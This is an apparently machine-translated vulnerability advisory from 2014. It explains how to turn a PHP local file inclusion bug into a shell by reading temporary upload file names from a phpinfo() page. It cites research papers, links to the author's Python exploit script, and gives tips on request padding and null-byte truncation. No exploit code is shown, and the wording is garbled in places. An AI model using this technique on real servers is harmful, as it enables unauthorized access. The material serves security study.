Use the phpinfo information LFI temporary file[POC]-vulnerability warning-the black bar safety net

2014-11-12T00:00:00
ID MYHACK58:62201455717
Type myhack58
Reporter idwar
Modified 2014-11-12T00:00:00

Description

Remember before foreign cattle raised by LFI contain temporary files?

Did feel a little tasteless, because the temporary file path and name is unknown, although the temporary file name can use a similar<>*? Other wildcards let's call it a wildcard match, while the N individual together with requests may also generate many temporary files, so use the wildcard character may not be able to match into, and the temporary file path to save the Also can only rely on guess.

We know in to the server any php file with a post request to upload data, will generate temporary files, didn't know the temporary file path and name can only be a wild guess, this time abroad, the friends propose the use of the phpinfo () it.

When any php file with a post request to upload data, can be directly in the phpinfo page to find the temporary file path and name.

Reference:

<http://gynvael.coldwind.pl/download.php?f=PHP_LFI_rfc1867_temporary_files.pdf>

<http://www.insomniasec.com/publications/LFI%20With%20PHPInfo%20Assistance.pdf>

This paper brings a python to write using script, at least I used N times did not succeed once, perhaps, is the indentation of the reason? The python code is written into the pdf. not a good idea:(

So write your own one, if the site is fast, then takes a few seconds, if the website is slow takes tens of seconds to getshell in.

Address:<http://secer.org/pentest/lfi_tmp.py>

If the space to hang out, please Save picture as rar decompression.

!

This script is only for network security practitioners and network security enthusiasts to study the exchange of use, please do not used for illegal purposes...... This or to by the way.......

-------- 2011.9.12 update--------

sogili test my script says error, so find a solution to him, by the update here.

Sometimes the other site itself the response is very slow, this time solution: try increasing the padding length to drag it out of the phpinfo page response.

In addition, some of the server itself can not be%0 0 truncated, this time to himself to think of a way to truncate it,. Or/or something.

[1] [2] next